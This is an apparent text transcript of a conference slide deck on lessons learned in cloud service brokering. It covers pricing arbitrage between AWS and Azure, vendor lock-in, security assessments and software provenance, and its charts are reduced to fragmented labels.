5 ¾ things we learned brokering clouds · 5 ¾ things we learned brokering clouds: why you should...
TRANSCRIPT
1
5 ¾ THINGS WE LEARNED BROKERING CLOUDS:Why you should trust your Broker more than your Banker
Jon-Michael C. Brook, CISSP
2AGENDA
• Introductions
• 5 Things Learned
• The Common Sense ¾
• Wrap-up
• Questions
3POLL 1: HEARD OF BROKERS?
• What level of exposure do you have to Cloud Brokers?
• Text and your message to 22333
4
5INTRODUCTIONS
5 years in Enterprise automation; 2 years in brokering
– Booz Allen (23K employees – 1.5K broker users)
– Government (280K employees – 2K+ users)
– Commercial
• Health Care
• Oil & Gas
• Pharmaceuticals
6POLL 2: OPEN SOURCE
• Do you use open source software?
– Yes, love it and would even contribute (if only I knew how to code)!
• 202259
– Depends on the situation, maybe Linux for a server...
• 202262
– Unfortunately, legal and compliance won't allow it.
• 202267
– No way man, I want someone's throat to choke!
• 202268
• Text a CODE to 22333
7
8#5 - OPEN IS MORE CLOSED THAN YOU THINK
• Modularity, Openness & Reusability
• Impressive open source technologies from Red Hat and others for enterprise automation
– CloudFormation/CloudForms
– AWS Integration
– Containerization/PaaS offerings
– Lacking the self-service and ease of use
✓ Limited sample scripts only
• Dependencies on other open source projects create limitations
– Staggered rollouts require custom code
• Implementer on the hook for updates
– New features released that overwrite custom code
9INTRODUCING THE OPEN CLOUD BROKER
User Portal or
Marketplace
IaaS
Broker
PaaS
Broker
SaaS
Broker
Data
Broker
Administrator
Portal
TaaS
Broker
Cloud
Orchestration
EngineXaaS
Broker
Capabilities• Mult IaaS integration• Sticky PaaS config• SaaS offerings
Benefits• Modular/Flexible• Open Source• Business Process
Integration• Marketplace
http://www.boozallen.com/consulting/management-consulting/operational-efficiency/cloud-service-brokering
10#4 MANAGE CUSTOMER EXPECTATIONS
Control Scope Creep
– Brokerage solutions are relatively new; expect a lot of PoC’s, customer demos and pilots.
– Create a well-defined Statement of Work/Contract
– Repeatable, tested, well-documented, packaged solution
Results
– Avoid cost overruns
– Prevent delivery delays
– Provides self-service capabilities
11#3 – STICKINESS KILLS!
Tempting, built-in services (PaaS)
– Price advantages (free?)
– Performance/Resiliency advantages
• Master/Slave databases
• Web sites
• Underlying core services (DNS, DHCP, NTP)
– Corresponding services w/ other CSPs?
DevOps/Orchestration
– Allows reuse of systems & services across multiple vendors
• Puppet, Chef, Juju, etc..
– Major broker advantage anyway!
12
Sizing Models Price Arbitrage
#2 - BROKER’S ALGORITHMS DEAL ALL THE CARDS
Cost Algorithms
EfficientArchitecture
& Design
Rebates & Discounts
13PRICING
Commoditization already in play
– Differentiable/Niche markets notas aggressive • Secure, Bring your own hardware,
VMware/Microsoft/OpenSource based
Price wars already started for IaaS
– Google, Azure and AWS price cuts• AWS already regularly discounted
services as new offerings brought online• Google aggressively pricing GCE• Microsoft working to match
14BROKER ALGORITHM CONSIDERATIONS
FOR CSP (AZURE, AWS, RACKSPACE, VCHS, ONPREM, CUSTOM) [
TIERS (WEB, DB, APP, DMZ, OOB, ETC);
NATIVESTICKY (YES, NO);
SECURITYLEVEL (PII, H, M, L);
LICENSE COSTS (OS, DB, HA, SEC, BYOL);
SPACEAVAIL (YES, NO);
RESILIENCY (#9’S);
ELASTIC (NONE, SLOW, AVG, AGGRESSIVE, CUSTOM);
SERVERS=RESILIENCY*ELASTIC(TIERS - NATIVESTICKY + COUNT (SECURITYLEVEL));
COST = SPACEAVAIL * NATIVESTICKY * ELASTIC * RESILIENCY
(LICENSE + TIERS* SECURITY * PRICE);
OPTIONS = BUDGET < COST;
]
BROKERDISPLAY (OPTIONS);
15ARBITRAGE: AN ILLUSTRATIVE EXAMPLE
CAPACITY PLANNING
16ARBITRAGE: AN ILLUSTRATIVE EXAMPLE
AZURE SIZING AND PRICING
17ARBITRAGE: AN ILLUSTRATIVE EXAMPLE
AMAZON WEB SERVICES SIZING AND PRICING
18SIDE BY SIDE COMPARISONS
0
5
10
15
20
25
30
35
40
t2s,
t2
m, m
3M
t2M
, t2
M, t
2S
m3
M, t
2M
, -m
3l,
-, -
m3
M, t
2M
, t2
Mm
3M
, m3
M, -
m3
L, t
2M
, -m
3X
L, -
, -
t2S,
m3
L, m
3M
m3
M, t
2M
, t2
Sm
3L,
t2
M, -
m3
XL,
-, -
t2S,
t2
S, m
3M
t2S,
t2
M, t
2M
t2M
, t2
M, t
2S
m3
M, t
2S,
-
Web DB App Auth
CPU Memory Capacity(in AWS m3.2XL units)
Peak (<2)
Incremental (8hr)
Persistent (24hr)0
10
20
30
40
50
60
70
80
S,M,L
M,M,S
L,M,-
XL,S,-
S,M,L
M,M,S
L,M,-
XL,S,-
S,M,L
M,M,S
L,M,-
XL,S,-
S,S,M
S,M,S
M,S,S
M,M,-
Web DB App Auth
CPU Capacity(in Azure XL units)
Peak
Incremental
Persistent
AMAZON WEB SERVICES SIZING AND PRICING
19SIDE BY SIDE COMPARISONS
05
10152025303540
t2s,
t2
m, m
3M
t2M
, t2
M, t
2S
m3
M, t
2M
, -m
3l,
-, -
m3
M, t
2M
, t2
Mm
3M
, m3
M, -
m3
L, t
2M
, -m
3X
L, -
, -
t2S,
m3
L, m
3M
m3
M, t
2M
, t2
Sm
3L,
t2
M, -
m3
XL,
-, -
t2S,
t2
S, m
3M
t2S,
t2
M, t
2M
t2M
, t2
M, t
2S
m3
M, t
2S,
-
Web DB App Auth
Memory Capacity(in AWS m3.2XL units)
Peak
Incremental
Persistent0
10
20
30
40
50
60
70
80
S,M,L
M,M,S
L,M,-
XL,S,-
S,M,L
M,M,S
L,M,-
XL,S,-
S,M,L
M,M,S
L,M,-
XL,S,-
S,S,M
S,M,S
M,S,S
M,M,-
Web DB App Auth
Memory Capacity(in Azure XL units)
Peak
Incremental
Persistent
AMAZON WEB SERVICES SIZING AND PRICING
20SIDE BY SIDE COMPARISONS
$-
$5.00
$10.00
$15.00
$20.00
$25.00
t2s,
t2
m, m
3M
t2M
, t2
M, t
2S
m3
M, t
2M
, -m
3l,
-, -
m3
M, t
2M
, t2
Mm
3M
, m3
M, -
m3
L, t
2M
, -m
3X
L, -
, -
t2S,
m3
L, m
3M
m3
M, t
2M
, t2
Sm
3L,
t2
M, -
m3
XL,
-, -
t2S,
t2
S, m
3M
t2S,
t2
M, t
2M
t2M
, t2
M, t
2S
m3
M, t
2S,
-
Web DB App Auth
AWS Price per day
Peak
Incremental
Persistent
$-
$10.00
$20.00
$30.00
$40.00
$50.00
$60.00
S,M,L
M,M,S
L,M,-
XL,S,-
S,M,L
M,M,S
L,M,-
XL,S,-
S,M,L
M,M,S
L,M,-
XL,S,-
S,S,M
S,M,S
M,S,S
M,M,-
Web DB App Auth
Azure Cost per Day
Peak
Incremental
Persistent
AMAZON WEB SERVICES SIZING AND PRICING
21ARBITRAGE ISSUES
Notice any problems with this example?Based on the relative CSP processing capabilities
• Is an Azure XL equal to an AWS m3.2XL?
– There are larger and more specialized units within all of the environments – IOPS, SSD, Memory, etc
• Does the computing/memory capability of an Azure instance offset the price differential
• AWS offers an ECU – elastic computing unit
• Azure bases their pricing on a similar set of statistics
– i.e. Database Throughput Unit,
Scrutinizing the broker’s algorithms with this level of detail difficult
Might include company sensitive information• At least ask the question
Forbes article
Gigaom
22GIGAOM: COMPARING CSP PERFORMANCE
http://research.gigaom.com/report/comparing-major-cloud-service-providers-virtual-processor-performance/
Again - Results Open to Interpretation
VIRTUAL PROCESSOR SCORING & DERIVATION:AWS, AZURE, RACKSPACE
23FORBES: COMPARE AWS/VCHS/AZURE
http://www.forbes.com/sites/benkepes/2014/08/15/vmware-stick-the-boot-into-amazon-pricing-but-are-they-telling-the-whole-story/
NO SMOOTH COMPARISON, TESTING ON AN APP BY APP BASIS
24#1 - SECURITY’S AN OPPORTUNITY
Know the CSPs and use their mitigations
• (Also know they may be sticky!)
• CloudHSM – root of trust w/ SafeNet Luna
• FedRAMP of Azure
Qualitative Assessments
• Gartner Magic Quadrant
• Broker Analysis of Alternatives
• FedRAMP
Quantitative Assessments
• CSA STAR
• SOC I/II Audits
Provenance & Pedigree
• aka Pre & Post Configuration
25QUALITATIVE ASSESSMENTS
IAAS GARTNER MAGIC QUADRANT
*Gartner, Magic Quadrant for Cloud Infrastructure as a Service, Lydia Leong et al., published: 28 May 2014
26RISK MITIGATION - CHOOSING CSPS
*Results based on Booz Allen Cloud Service Provider AoA – 2014.05.30
PROVIDE A QUICK STARTING POINT
Brokers need to start the discussion• Identify most important customer risks• Combine with industry knowledge
and experienceBCP/DR
• All Microsoft shop—does it make sense to retrain to another provider?
Provisioning• Processes and procedures in place—retool from
enterprise VMware? Automation
• Linux scripts transfer over directly—DevOpsmakes easy to port anywhere?
Governance, Risk & Compliance• Which providers offer SOC/IaaS underlying
certifications to pass PCI/HIPAA/FISMA audits?
27POLL: SOFTWARE SOURCES
• How do you handle software installations within your enterprise environment?
• We have gold disks that provide our baseline image– 189504
• We download the executable from the vendor– 189511
• We check the hash on all files before rollout– 199643
• We download the source and compile it ourselves whenever possible– 199648
• We test every patch within a lab environment– 199649
• We automate rollout– 199650
• We automate rollback– 199653
• Text a CODE to 22333
28
29PROVENANCE & PEDIGREE
Beyond Configuration Management– On-premise Enterprise: Utilize an ISO, test downloaded patches
from “vendor” • How many people here actually check the hashes?
• Vendor infected distribution
– Sony/BMG rootkit, Dell firmware, Stuxnet anyone?
– Even bigger issue in the cloud? snapshots, most software from linked locations, ISOs difficult to load/use
Provenance– Provide contextual evidence for its original production or
discovery, by establishing the sequences of its formal ownership, custody, and places of storage
Pedigree– A document to record ancestry
Known “good” software/updates/distributions– Trusted Broker service
• Define your repositories for Linux updates
– i.e. spacewalk.redhat.com; www.pulpproject.org
30# ¾ - TRUST
Not looking for a Boy Scout
– Do need transparency:
• Cost savings?Pass a portion on to customer
• Sticky services?Advise on implications ahead of time
• Unmitigated security risks? Come to terms and offer alternatives,even if another vendor
– Most of us are in business
– It is your reputation
Value the relationship for the long run
– Quick sale/qualifier might damage reputation if not executed successfully
32HOW TO CREATE A NEW POLL
33HOW TO CREATE A NEW POLL